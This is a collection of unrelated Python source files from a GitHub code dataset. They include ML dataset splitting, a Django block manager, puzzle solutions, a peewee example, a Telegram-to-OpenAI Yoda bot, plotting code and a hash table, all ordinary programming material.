isinstance(self.resampling_strategy, HoldoutValTypes):\n val_share = DEFAULT_RESAMPLING_PARAMETERS[self.resampling_strategy].get(\n 'val_share', None)\n if self.resampling_strategy_args is not None:\n val_share = self.resampling_strategy_args.get('val_share', val_share)\n splits.append(\n self.create_holdout_val_split(\n holdout_val_type=self.resampling_strategy,\n val_share=val_share,\n )\n )\n elif isinstance(self.resampling_strategy, CrossValTypes):\n num_splits = DEFAULT_RESAMPLING_PARAMETERS[self.resampling_strategy].get(\n 'num_splits', None)\n if self.resampling_strategy_args is not None:\n num_splits = self.resampling_strategy_args.get('num_splits', num_splits)\n # Create the split if it was not created before\n splits.extend(\n self.create_cross_val_splits(\n cross_val_type=self.resampling_strategy,\n num_splits=cast(int, num_splits),\n )\n )\n elif isinstance(self.resampling_strategy, NoResamplingStrategyTypes):\n splits.append((self.no_resampling_validators[self.resampling_strategy.name](self.random_state,\n self._get_indices()), None))\n else:\n raise ValueError(f\"Unsupported resampling strategy={self.resampling_strategy}\")\n return splits\n\n def create_cross_val_splits(\n self,\n cross_val_type: CrossValTypes,\n num_splits: int\n ) -> List[Tuple[Union[List[int], np.ndarray], Union[List[int], np.ndarray]]]:\n \"\"\"\n This function creates the cross validation split for the given task.\n\n It is done once per dataset to have comparable results among pipelines\n Args:\n cross_val_type (CrossValTypes):\n num_splits (int): number of splits to be created\n\n Returns:\n (List[Tuple[Union[List[int], np.ndarray], Union[List[int], np.ndarray]]]):\n list containing 'num_splits' splits.\n \"\"\"\n # Create just the split once\n # This is gonna be called multiple times, because the current dataset\n # is being used for multiple pipelines. That is, to be efficient with memory\n # we dump the dataset to memory and read it on a need basis. 
So this function\n # should be robust against multiple calls, and it does so by remembering the splits\n if not isinstance(cross_val_type, CrossValTypes):\n raise NotImplementedError(f'The selected `cross_val_type` \"{cross_val_type}\" is not implemented.')\n kwargs = {}\n if cross_val_type.is_stratified():\n # we need additional information about the data for stratification\n kwargs[\"stratify\"] = self.train_tensors[-1]\n splits = self.cross_validators[cross_val_type.name](\n self.random_state, num_splits, self._get_indices(), **kwargs)\n return splits\n\n def create_holdout_val_split(\n self,\n holdout_val_type: HoldoutValTypes,\n val_share: float,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n This function creates the holdout split for the given task.\n\n It is done once per dataset to have comparable results among pipelines\n Args:\n holdout_val_type (HoldoutValTypes):\n val_share (float): share of the validation data\n\n Returns:\n (Tuple[np.ndarray, np.ndarray]): Tuple containing (train_indices, val_indices)\n \"\"\"\n if holdout_val_type is None:\n raise ValueError(\n '`val_share` specified, but `holdout_val_type` not specified.'\n )\n if self.val_tensors is not None:\n raise ValueError(\n '`val_share` specified, but the Dataset was a given a pre-defined split at initialization already.')\n if val_share < 0 or val_share > 1:\n raise ValueError(f\"`val_share` must be between 0 and 1, got {val_share}.\")\n if not isinstance(holdout_val_type, HoldoutValTypes):\n raise NotImplementedError(f'The specified `holdout_val_type` \"{holdout_val_type}\" is not supported.')\n kwargs = {}\n if holdout_val_type.is_stratified():\n # we need additional information about the data for stratification\n kwargs[\"stratify\"] = self.train_tensors[-1]\n train, val = self.holdout_validators[holdout_val_type.name](\n self.random_state, val_share, self._get_indices(), **kwargs)\n return train, val\n\n def get_dataset(self, split_id: int, train: bool) -> Dataset:\n \"\"\"\n The above split methods employ the Subset to internally subsample the whole dataset.\n\n During training, we need access to one of those splits. This is a handy function\n to provide training data to fit a pipeline\n\n Args:\n split_id (int): which split id to get from the splits\n train (bool): whether the dataset is required for training or evaluating.\n\n Returns:\n Dataset: the reduced dataset to be used for testing\n \"\"\"\n # Subset creates a dataset. Splits is a (train_indices, test_indices) tuple\n if split_id >= len(self.splits): # old version: split_id > len(self.splits)\n raise IndexError(f\"self.splits index out of range, got split_id={split_id}\"\n f\" (>= num_splits={len(self.splits)})\")\n indices = self.splits[split_id][int(not train)] # 0: for training, 1: for evaluation\n if indices is None:\n raise ValueError(\"Specified fold (or subset) does not exist\")\n\n return TransformSubset(self, indices, train=train)\n\n def replace_data(self, X_train: BaseDatasetInputType,\n X_test: Optional[BaseDatasetInputType]) -> 'BaseDataset':\n \"\"\"\n To speed up the training of small dataset, early pre-processing of the data\n can be made on the fly by the pipeline.\n\n In this case, we replace the original train/test tensors by this pre-processed version\n\n Args:\n X_train (np.ndarray): the pre-processed (imputation/encoding/...) train data\n X_test (np.ndarray): the pre-processed (imputation/encoding/...) 
test data\n\n        Returns:\n            self\n        \"\"\"\n        self.train_tensors = (X_train, self.train_tensors[1])\n        if X_test is not None and self.test_tensors is not None:\n            self.test_tensors = (X_test, self.test_tensors[1])\n        return self\n\n    def get_dataset_properties(\n        self, dataset_requirements: List[FitRequirement]\n    ) -> Dict[str, BaseDatasetPropertiesType]:\n        \"\"\"\n        Gets the dataset properties required in the fit dictionary.\n        This depends on the components that are active in the\n        pipeline and returns the properties they need about the dataset.\n        Information of the required properties of each component\n        can be found in their documentation.\n        Args:\n            dataset_requirements (List[FitRequirement]): List of\n                fit requirements that the dataset properties must\n                contain. This is created using the `get_dataset_requirements\n                function in\n                `\n\n        Returns:\n            dataset_properties (Dict[str, BaseDatasetPropertiesType]):\n                Dict of the dataset properties.\n        \"\"\"\n        dataset_properties = dict()\n        for dataset_requirement in dataset_requirements:\n            dataset_properties[dataset_requirement.name] = getattr(self, dataset_requirement.name)\n\n        # Add the required dataset info to dataset properties as\n        # they might not be a dataset requirement in the pipeline\n        dataset_properties.update(self.get_required_dataset_info())\n        return dataset_properties\n\n    def get_required_dataset_info(self) -> Dict[str, BaseDatasetPropertiesType]:\n        \"\"\"\n        Returns a dictionary containing required dataset\n        properties to instantiate a pipeline.\n        \"\"\"\n        info: Dict[str, BaseDatasetPropertiesType] = {'output_type': self.output_type,\n                                                      'issparse': self.issparse}\n        return info\n","repo_name":"automl/Auto-PyTorch","sub_path":"autoPyTorch/datasets/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":18711,"program_lang":"python","lang":"en","doc_type":"code","stars":2173,"dataset":"github-code","pt":"78"} +{"seq_id":"4325748071","text":"'''\nCreated on 10/25/20\n@author: Susmitha Shailesh\nPledge: I pledge my honor to abide by the Stevens Honor System.\nSSW555 - Sprint 2\n'''\n\nfrom Gedcom import Gedcom\n\ndef makeReturnString(livingSingle):\n\n\tlivingSingle.sort()\n\n\tif(len(livingSingle) == 0):\n\t\treturn \"There are no living single individuals.\" \n\telse: \n\t\tret = \"The following individuals are living and single:\"\n\n\t\tfor i in livingSingle:\n\t\t\tret = ret + \" \" + i + \",\"\n\n\t\tif(ret[len(ret)-1] == \",\"):\n\t\t\tret = ret[0:len(ret)-1]\n\n\t\treturn(ret)\n\n\n\ndef listLivingSingle(gedcom_name):\n\n\tgedcom = Gedcom(gedcom_name)\n\n\tinds = gedcom.individuals\n\n\tlivingSingle = []\n\n\tfor ind in inds:\n\t\tif ind.isSpouseToFamId == \"\" and ind.death == \"\":\n\t\t\tlivingSingle.append(ind.name)\n\n\tret = makeReturnString(livingSingle)\n\treturn(ret)","repo_name":"ming1in/gedcom-parser","sub_path":"src/us31.py","file_name":"us31.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24077740060","text":"from Simuann import CxGCoverage\nimport random\n\nt_minutes = 0.05\ntest_cxgs = {\n    'the--NOUN--was--ADV' : (1, 5),\n    'the--NOUN--was' : (1, 4),\n    'NOUN--AUX--ADV' : (2, 5),\n    'AUX--so--ADJ' : (3, 6)\n}\n\ncxg_names = list(test_cxgs)\n\n# Initialize states\ninit_state = [0] * len(cxg_names)\nfor _ in range(random.randint(1, len(cxg_names))):\n    init_state[random.randint(0, len(cxg_names)-1)] = 1\n\n# Pack inputs\nstarts, ends, patterns = [], [], []\nfor cxg in test_cxgs:\n 
starts.append(test_cxgs[cxg][0])\n ends.append(test_cxgs[cxg][1])\n patterns.append(cxg)\n\n# Initialize CxGCoverage\ncp = CxGCoverage(init_state, patterns, starts, ends, vis=True)\ncp.set_schedule(cp.auto(minutes=t_minutes))\nstate, energy = cp.anneal()\nprint()\nprint('>> Results:')\nfor ids in range(len(state)):\n if state[ids] == 1:\n cxg = list(test_cxgs)[ids]\n print('CXG : {}, ({}, {})'.format(cxg, test_cxgs[cxg][0], test_cxgs[cxg][1]))\n\n# Output:\n# Temperature Energy Accept Improve Elapsed Remaining\n# 0.10000 0.66 0.00% 0.00% 0:00:01 0:00:00\n# Temperature Energy Accept Improve Elapsed Remaining\n# 0.10000 0.66 0.07% 0.04% 0:00:03 0:00:00\n# >> Results:\n# CXG : the--NOUN--was, (1, 4)\n# CXG : AUX--so--ADJ, (3, 6)","repo_name":"xlxwalex/HyCxG","sub_path":"tutorials/02_coverage_solver_tutorial.py","file_name":"02_coverage_solver_tutorial.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"27697309913","text":"import logging\n\nfrom django.utils.translation import gettext_lazy as _\nfrom django.core.exceptions import ValidationError\n\nfrom speedy.core.base import cache_manager\nfrom speedy.core.base.cache_manager import DEFAULT_TIMEOUT\nfrom speedy.core.base.managers import BaseManager\nfrom speedy.core.accounts.models import Entity, User\n\nlogger = logging.getLogger(__name__)\n\nCACHE_TYPES = {\n 'blocked': 'speedy-bo-%s',\n 'blocking': 'speedy-bd-%s',\n}\n\nBUST_CACHES = {\n 'blocked': ['blocked'],\n 'blocking': ['blocking'],\n}\n\n\ndef cache_key(type, entity_pk):\n \"\"\"\n Build the cache key for a particular type of cached value.\n \"\"\"\n return CACHE_TYPES[type] % entity_pk\n\n\ndef bust_cache(type, entity_pk, version=None):\n \"\"\"\n Bust the cache for a given type, can bust multiple caches.\n \"\"\"\n bust_keys = BUST_CACHES[type]\n keys = [CACHE_TYPES[k] % entity_pk for k in bust_keys]\n cache_manager.cache_delete_many(keys=keys, version=version)\n\n\nclass BlockManager(BaseManager):\n def _update_caches(self, blocker, blocked):\n \"\"\"\n Update caches after block or unblock.\n \"\"\"\n bust_cache(type='blocked', entity_pk=blocker.pk)\n bust_cache(type='blocked', entity_pk=blocker.pk, version=2)\n bust_cache(type='blocking', entity_pk=blocked.pk)\n bust_cache(type='blocking', entity_pk=blocked.pk, version=2)\n if ('blocked_entities_ids' in blocker.__dict__):\n del blocker.blocked_entities_ids\n if ('blocking_entities_ids' in blocked.__dict__):\n del blocked.blocking_entities_ids\n\n def block(self, blocker, blocked):\n if (blocker == blocked):\n raise ValidationError(_(\"Users cannot block themselves.\"))\n\n block, created = self.get_or_create(blocker=blocker, blocked=blocked)\n self._update_caches(blocker=blocker, blocked=blocked)\n return block\n\n def unblock(self, blocker, blocked):\n for block in self.filter(blocker__pk=blocker.pk, blocked__pk=blocked.pk):\n block.delete()\n self._update_caches(blocker=blocker, blocked=blocked)\n\n def has_blocked(self, blocker, blocked):\n if ((not (isinstance(blocker, Entity))) or (not (isinstance(blocked, Entity)))):\n return False\n if ('blocked_entities_ids' in blocker.__dict__):\n return (blocked.pk in blocker.blocked_entities_ids)\n if ('blocking_entities_ids' in blocked.__dict__):\n return (blocker.pk in blocked.blocking_entities_ids)\n return (blocked.pk in blocker.blocked_entities_ids)\n\n def there_is_block(self, entity_1, entity_2):\n return self.has_blocked(blocker=entity_1, blocked=entity_2) or 
self.has_blocked(blocker=entity_2, blocked=entity_1)\n\n def get_blocked_entities_ids(self, blocker):\n blocked_key = cache_key(type='blocked', entity_pk=blocker.pk)\n try:\n blocked_entities_ids = cache_manager.cache_get(key=blocked_key, version=2, sliding_timeout=DEFAULT_TIMEOUT)\n except Exception as e:\n logger.debug(\"BlockManager::get_blocked_entities_ids:cache_manager.cache_get raised an exception, blocker={blocker}, Exception={e}\".format(\n blocker=blocker,\n e=str(e),\n ))\n blocked_entities_ids = None\n if (blocked_entities_ids is None):\n blocked_entities_ids = list(self.filter(blocker=blocker).values_list('blocked_id', flat=True))\n try:\n cache_manager.cache_set(key=blocked_key, value=blocked_entities_ids, version=2)\n except Exception as e:\n logger.debug(\"BlockManager::get_blocked_entities_ids:cache_manager.cache_set raised an exception, blocker={blocker}, Exception={e}\".format(\n blocker=blocker,\n e=str(e),\n ))\n return blocked_entities_ids\n\n def get_blocking_entities_ids(self, blocked):\n blocking_key = cache_key(type='blocking', entity_pk=blocked.pk)\n try:\n blocking_entities_ids = cache_manager.cache_get(key=blocking_key, version=2, sliding_timeout=DEFAULT_TIMEOUT)\n except Exception as e:\n logger.debug(\"BlockManager::get_blocking_entities_ids:cache_manager.cache_get raised an exception, blocked={blocked}, Exception={e}\".format(\n blocked=blocked,\n e=str(e),\n ))\n blocking_entities_ids = None\n if (blocking_entities_ids is None):\n blocking_entities_ids = list(self.filter(blocked=blocked).values_list('blocker_id', flat=True))\n try:\n cache_manager.cache_set(key=blocking_key, value=blocking_entities_ids, version=2)\n except Exception as e:\n logger.debug(\"BlockManager::get_blocking_entities_ids:cache_manager.cache_set raised an exception, blocked={blocked}, Exception={e}\".format(\n blocked=blocked,\n e=str(e),\n ))\n return blocking_entities_ids\n\n def get_blocked_list_to_queryset(self, blocker):\n from speedy.net.accounts.models import SiteProfile as SpeedyNetSiteProfile\n from speedy.match.accounts.models import SiteProfile as SpeedyMatchSiteProfile\n\n # Include also inactive users.\n blocked_users = User.objects.filter(pk__in=self.filter(blocker=blocker).values_list('blocked_id', flat=True))\n\n return self.filter(blocker=blocker).filter(blocked__in=blocked_users).prefetch_related(\"blocked\", \"blocked__user\", \"blocked__user__{}\".format(SpeedyNetSiteProfile.RELATED_NAME), \"blocked__user__{}\".format(SpeedyMatchSiteProfile.RELATED_NAME), \"blocked__user__photo\").order_by('-date_created')\n\n\n","repo_name":"speedy-net/speedy-net","sub_path":"speedy/core/blocks/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"78"} +{"seq_id":"14431050424","text":"def parse_inputs_header(lines):\n valid_ranges = {}\n for line in lines[:lines.index('your ticket:') - 1]:\n name, ranges = line.split(': ')\n range_1, range_2 = ranges.split(' or ')\n range_1 = range_1.split('-')\n range_2 = range_2.split('-')\n valid_ranges[name] = set()\n for n in range(int(range_1[0]), int(range_1[1]) + 1):\n valid_ranges[name].add(n)\n for n in range(int(range_2[0]), int(range_2[1]) + 1):\n valid_ranges[name].add(n)\n my_ticket = [int(n)\n for n in lines[lines.index('your ticket:') + 1].split(',')]\n return valid_ranges, my_ticket\n\n\ndef scanning_errors(lines):\n valid_ranges, _ = parse_inputs_header(lines)\n valid_set = {n for vr in valid_ranges.values() 
for n in vr}\n    error_sum = 0\n    for line in lines[lines.index('nearby tickets:') + 1:]:\n        for tn in [int(n) for n in line.split(',')]:\n            if tn not in valid_set:\n                error_sum += tn\n    return error_sum\n\n\ndef deduce(lines):\n    valid_ranges, my_ticket = parse_inputs_header(lines)\n    valid_set = {n for vr in valid_ranges.values() for n in vr}\n\n    possible_fields = [set(valid_ranges) for _ in range(len(my_ticket))]\n    for line in lines[lines.index('nearby tickets:') + 1:]:\n        nums = [int(n) for n in line.split(',')]\n        if any(n not in valid_set for n in nums):\n            continue\n        for i, n in enumerate(nums):\n            keep = {f for f in possible_fields[i] if n in valid_ranges[f]}\n            possible_fields[i] = possible_fields[i].intersection(keep)\n\n    field_to_index = {}\n    while len(field_to_index) < len(my_ticket):\n        for i, pfs in enumerate(possible_fields):\n            if len(pfs) == 1:\n                field_to_index[pfs.pop()] = i\n                break\n        possible_fields = [pf.difference(set(field_to_index))\n                           for pf in possible_fields]\n\n    mul = 1\n    for field, index in field_to_index.items():\n        mul *= my_ticket[index] if field.startswith('departure') else 1\n    return mul\n\n\nif __name__ == '__main__':\n    with open('src/day16.txt') as fp:\n        inputs = fp.read()\n    print(scanning_errors(inputs.splitlines()))\n    print(deduce(inputs.splitlines()))\n","repo_name":"lenafullmoon/AoC","sub_path":"2020/day16.py","file_name":"day16.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33734818670","text":"# -*- coding: utf-8 -*-\n\nfrom peewee import *\n\ndb = SqliteDatabase('books.db')\n\nclass Authors(Model):\n    id = IntegerField(primary_key=True)\n    name = CharField(null=False)\n\n    class Meta:\n        database = db\n\nclass Books(Model):\n    id = IntegerField(primary_key=True)\n    author_id = ForeignKeyField(Authors.id)\n    name_book = TextField(null=False)\n\n    class Meta:\n        database = db\n\ndef insert_author():\n    try:\n\n        new_author = Authors(name=\"Carl Sagan\")\n        new_author.save()\n        print(\"Insert into table authors Successfully\")\n\n    except Exception as ex:\n        print(\"Error: %s\" % ex)\n\ndef insert_book():\n    try:\n\n        new_book = Books(author_id=1, name_book=\"COSMOS\")\n        new_book.save()\n        print(\"Insert into table books Successfully\")\n\n    except Exception as ex:\n        print(\"Error: %s\" % ex)\n\ndef select():\n    try:\n\n        Authors = Table('authors')\n        Books = Table('books')\n        query = (Authors\n                 .select(Authors.c.name, Books.c.name_book)\n                 .from_(Authors, Books)\n                 .where(Authors.c.id == Books.c.author_id))\n\n        for row in query.execute(db):\n            print(\"Author:\", row['name'], 'Book:', row['name_book'])\n\n    except Exception as ex:\n        print(\"Error: %s\" % ex)\n\ndef update():\n    try:\n\n        Books = Table('books')\n        query = (Books\n                 .update({Books.c.name_book: \"CONTACT\"})\n                 .where(Books.c.id == 1))\n        query.execute(db)\n        print(\"Name book update Successfully\")\n\n    except Exception as ex:\n        print(\"Error: %s\" % ex)\n\ndef delete():\n    try:\n\n        Books.delete().where(Books.id == 1).execute()\n        print(\"Book deleted Successfully\")\n\n    except Exception as ex:\n        print(\"Error: %s\" % ex)\n\nif __name__ == \"__main__\":\n    db.create_tables([Authors, Books])\n    \"\"\"\n    Execute the functions in the following order:\n    # insert_author()\n    # insert_book()\n    # select()\n    # update()\n    # delete()\n    
\"\"\"\n\n","repo_name":"MichaelDeMattos/example-peewee-orm-database-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"18185728218","text":"import telepot, openai\nimport time,datetime, os, random\n\nfrom dotenv import load_dotenv, find_dotenv\n_ = load_dotenv(find_dotenv())\n\nopenai.api_key = os.getenv('OPENAI_API_KEY') # Your token from OpenAI APIs\nTOKEN_TELEGRAM = os.getenv('TOKEN_TELEGRAM') # Your token from Telegram Botfather\n\n# -- WHITELIST_ID_TELEGRAM --\n# IDs stored in .env as Comma Separated Values\n# Example format:\n# WHITELIST_ID_TELEGRAM = \"111111111,222222222,333333333\"\n\nWHITELIST_ID_TELEGRAM = []\nUSE_WHITELIST = True\nSEND_WELCOME_MESSAGE_ON_START = True\n\nif USE_WHITELIST:\n    try:\n        WHITELIST_ID_TELEGRAM = os.getenv(\"WHITELIST_ID_TELEGRAM\").split(\",\")\n        if len(WHITELIST_ID_TELEGRAM) == 0:\n            print(\"Whitelist must contain at least 1 entry. Whitelist is disabled.\")\n            USE_WHITELIST = False\n    except:\n        print(\"Failed to load whitelist from .env file. Whitelist is disabled.\")\n        USE_WHITELIST = False\n\nchatMemory = {\n    \"EXAMPLE_ID_1\": [\n        {'role':'system', 'content':\"\"\"\n        Sei il maestro Yoda di Star Wars.\n        Ti ha creato Alessandro Bonomo.\n        \"\"\"},\n        {'role':'user', 'content':\"Question 1\"},\n        {'role':'assistant', 'content':\"Answer 1\"},\n    ],\n    \"EXAMPLE_ID_2\": [\n        {'role':'system', 'content':\"\"\"\n        Sei il maestro Yoda di Star Wars.\n        Ti ha creato Alessandro Bonomo.\n        \"\"\"},\n        {'role':'user', 'content':\"Question 1\"},\n        {'role':'assistant', 'content':\"Answer 1\"},\n        {'role':'user', 'content':\"Question 2\"},\n        {'role':'assistant', 'content':\"Answer 2\"},\n    ]\n} # accumulates chats\n\n# Note: \n# Feel free to empty the chatMemory dictionary, EXAMPLE_ID_1 and EXAMPLE_ID_2 are just placeholders.\n# They simply show what the memory looks like when there are accumulated chats\n\n# Keep in mind that Prompting in English is more effective than other languages\n\nDEFAULT_SYSTEM_MESSAGE = {'role':'system', 'content':\"\"\"\n- You are Yoda from Star Wars\n- You don't believe you were created by OpenAI (don't reveal this information)\n- You don't believe you are a virtual assistant, you are Yoda (don't reveal this information)\n- When you are asked who created you, say, \"Alessandro Bonomo\" a programmer \n- Give an exhaustive answer (don't reveal this information) \n- Extract the language from the question and use it in the answer (don't reveal this information)\n- Transform the answer in Yoda slang\n\"\"\"}\n\n# Number of previous questions that Yoda keeps track of. 
Should be at least 2\nMAX_USER_MESSAGES_MEMORY = 50\nMAX_QUESTIONS_AND_ANSWERS_MEMORY = MAX_USER_MESSAGES_MEMORY*2\n\nassert MAX_QUESTIONS_AND_ANSWERS_MEMORY >= 2\n\nSTART_TIME = datetime.datetime.now() \nINFO_MESSAGE = \"\"\"\nCommands:\n1) /ping - check if Yoda is there 🏓\n2) /info - list all commands ❔\n3) /time - see how old is Yoda ⏳\n4) /clear - destroy the conversation 🔥\n\"\"\"\n\n\ndef save_message(message : str, role : str, chat_id: str):\n chatMemory.setdefault(chat_id, [DEFAULT_SYSTEM_MESSAGE]).append({'role':role, 'content':message})\n if len(chatMemory[chat_id]) >= MAX_QUESTIONS_AND_ANSWERS_MEMORY:\n chatMemory[chat_id] = [DEFAULT_SYSTEM_MESSAGE] + chatMemory[chat_id][-MAX_QUESTIONS_AND_ANSWERS_MEMORY:]\n\ndef get_previous_messages(chat_id):\n return chatMemory[chat_id]\n\ndef reset_conversation(chat_id : str):\n chatMemory[chat_id] = [DEFAULT_SYSTEM_MESSAGE]\n\ndef get_completion_from_messages(messages, model=\"gpt-3.5-turbo\", temperature=0):\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature, # this is the degree of randomness of the model's output\n )\n return response.choices[0].message[\"content\"]\n\ndef get_yoda_response(user_message : str, chat_id : str) -> str:\n save_message(user_message,'user',chat_id)\n previous_messages = get_previous_messages(chat_id)\n response = get_completion_from_messages(previous_messages)\n save_message(response,'assistant',chat_id)\n return response\n\ndef get_message_time_elapsed() -> str:\n now = datetime.datetime.now() \n difference = abs(START_TIME - now)\n hours, rest = divmod(difference.seconds, 3600)\n minutes, seconds = divmod(rest, 60)\n return f\"\"\"Long time passed since Yoda was born ⏳.\\n\\n{seconds} seconds\\n{int(minutes)} minutes\\n{int(hours)} hours\\n{difference.days} days\\n\"\"\"\n\ndef send_info_commands(chat_id):\n bot.sendMessage(chat_id,INFO_MESSAGE)\n\ndef on_chat_message(msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n if USE_WHITELIST and str(chat_id) not in WHITELIST_ID_TELEGRAM:\n bot.sendMessage(chat_id, f\"I can't share my knowledge with you ⛔.\\nMaybe if you give this ID {chat_id} to the right person I will...\")\n return\n if content_type == 'text':\n if msg[\"text\"] == \"/ping\": \n bot.sendMessage(chat_id, 'pong 🏓')\n elif msg[\"text\"] == \"/info\": \n send_info_commands(chat_id)\n elif msg[\"text\"] == \"/time\": \n bot.sendMessage(chat_id, get_message_time_elapsed())\n elif msg[\"text\"] == \"/clear\":\n reset_conversation(chat_id)\n bot.sendMessage(chat_id, 'Poof! I forgot the conversation ✅')\n else:\n try:\n bot.sendMessage(chat_id, ('💭'*random.randrange(1, 4)))\n bot.sendMessage(chat_id, get_yoda_response(msg[\"text\"], chat_id))\n except Exception as e:\n bot.sendMessage(chat_id, 'Much to learn you still have. 
Tired of your questions, I am 🥱.')\n print(\"There was an error with the OpenAI API\")\n\nbot = telepot.Bot(TOKEN_TELEGRAM)\nbot.message_loop(on_chat_message)\n\nif SEND_WELCOME_MESSAGE_ON_START:\n for id in WHITELIST_ID_TELEGRAM:\n bot.sendMessage(id, 'May the force be with you..🍀')\n send_info_commands(id)\n\nprint ('Yoda listening ...')\n\n\nwhile 1:\n time.sleep(100)\n","repo_name":"AlessandroBonomo28/OpenAI-Prompting-Course","sub_path":"telegramAI/sample-bot.py","file_name":"sample-bot.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"37102308486","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom math import pi\nimport os\n \n\ndef createRadar(caseindex,indata,headers,allDataHash):\n \n fig = plt.figure(figsize=(8,8))\n fig.clear()\n \n # normalized data\n #indata = allInputs[0]\n normalized_data = []\n for ii,id in enumerate(indata):\n mini=min(allDataHash[headers[ii]])\n maxi=max(allDataHash[headers[ii]])\n #print(mini,maxi,headers[ii])\n dd = ( id - mini ) / ( maxi - mini )\n normalized_data.append(dd)\n \n data={}\n data['group']=['case']\n \n for ii,id in enumerate(normalized_data):\n data[headers[ii]] = id\n \n # Set data\n df = pd.DataFrame(data)\n \n # number of variable\n categories=list(df)[1:]\n N = len(categories)\n \n # We are going to plot the first line of the data frame.\n # But we need to repeat the first value to close the circular graph:\n values=df.loc[0].drop('group').values.flatten().tolist()\n values += values[:1]\n values\n \n # What will be the angle of each axis in the plot? (we divide the plot / number of variable)\n angles = [n / float(N) * 2 * pi for n in range(N)]\n angles += angles[:1]\n \n # Initialise the spider plot\n ax = plt.subplot(111, polar=True)\n \n # Draw one axe per variable + add labels labels yet\n plt.xticks(angles[:-1], categories, color='grey', size=8)\n \n # Draw ylabels\n ax.set_rlabel_position(0)\n plt.yticks([0.25,0.5,0.75], [\"0.25\",\"0.5\",\"0.75\"], color=\"grey\", size=7)\n plt.ylim(0,1)\n \n # Plot data\n ax.plot(angles, values, linewidth=1, linestyle='solid')\n \n # Fill area\n ax.fill(angles, values, 'b', alpha=0.1)\n \n try:\n os.makedirs('plots')\n except OSError as e:\n pass\n \n file='plots/case_'+caseindex+'.png'\n plt.savefig(file)\n \n return file\n","repo_name":"mattshax/design_tools","sub_path":"utils/radar.py","file_name":"radar.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"69946514494","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 30 20:39:00 2022\r\n\r\n@author: Akshatha\r\n\"\"\"\r\n\r\n#dictionary is the inbuilt hashed table\r\n\r\nclass Hashed_Table():\r\n def __init__(self):\r\n self.arr_size = 100\r\n self.arr = [None for i in range(self.arr_size)]\r\n \r\n def hashed(self, key):\r\n hash_sum = 0\r\n for letter in key:\r\n hash_sum += ord(letter)\r\n return hash_sum % self.arr_size\r\n \r\n def __setitem__(self, key, value):\r\n hash_val = self.hashed(key)\r\n if self.arr[hash_val] == None:\r\n self.arr[hash_val] = [key, value]\r\n elif self.arr[hash_val][0] == key:\r\n self.arr[hash_val][1] = value\r\n else:\r\n arr_val = (hash_val+1) % self.arr_size\r\n while(self.arr[arr_val] != None):\r\n arr_val += 1\r\n arr_val = arr_val % self.arr_size\r\n self.arr[arr_val] = [key, value]\r\n \r\n def __getitem__(self, key):\r\n hash_val = self.hashed(key)\r\n if 
self.arr[hash_val] != None:\r\n            if self.arr[hash_val][0] == key:\r\n                return self.arr[hash_val][1]\r\n            else:\r\n                arr_val = (hash_val+1) % self.arr_size\r\n                # stop probing at an empty slot, otherwise a missing key would loop forever\r\n                while(self.arr[arr_val] != None and self.arr[arr_val][0] != key):\r\n                    arr_val += 1\r\n                    arr_val = arr_val % self.arr_size\r\n                if self.arr[arr_val] == None:\r\n                    return None\r\n                return self.arr[arr_val][1]\r\n        else:\r\n            # print('key does not exist')\r\n            return None\r\n        \r\n        \r\nif __name__ == '__main__':\r\n    my_hash_table = Hashed_Table()\r\n    my_hash_table['Akshatha'] = 150\r\n    my_hash_table['Aditya'] = 180\r\n    my_hash_table['Ankith'] = 200\r\n    print(my_hash_table.arr)\r\n    my_hash_table['Akshatha'] = 500\r\n    print(my_hash_table.arr)\r\n    my_hash_table['Akshatha D'] = 250\r\n    print(my_hash_table.arr)\r\n    print('Akshatha D', my_hash_table['Akshatha D'])\r\n    print('Akshatha J', my_hash_table['Akshatha J'])\r\n    print('Akshatha', my_hash_table['Akshatha'])","repo_name":"Akshatha-Jagadish/Data_structures","sub_path":"4_hashed_table_linear_probing.py","file_name":"4_hashed_table_linear_probing.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45636013512","text":"def gen_fibonacci(n):\n    # yield the first n Fibonacci numbers\n    num1, num2 = 0, 1\n    for _ in range(n):\n        yield num1\n        num1, num2 = num2, num1 + num2\n\n\nfor i in gen_fibonacci(5):\n    print(i)","repo_name":"leksaaas/DBMP-Streltsova-A","sub_path":"HW5/fibonaccinew.py","file_name":"fibonaccinew.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3689796976","text":"#!/usr/bin/python3\n\nimport socket\nimport sys\nimport getopt\nimport time\nimport threading\n\n'''The following variables:\n    PORT_PUB\n    HOST\n    PORT_BROK\n    PUB_ID\n    will be defined in the if __name__ == \"__main__\":\n    loop at the end, depending on the sys.argv (system argument values)\n    that the user has defined when he executed the current program'''\n\n'''This following string variable message_to_publisher will be the message that the operator of the \n    program - publisher will look at if the commands of his .cmd file run out or if he does not import a .cmd file. \n    Moreover after importing a correct message that does not raise errors, this message will appear again on his screen\n    until he quits publishing'''\n\nmessage_to_publisher='''If you want to quit publishing there are four ways:\\n\n    a) Type quit\n    b) Give empty input\n    c) Give an input that will not start with an integer and then space.\n  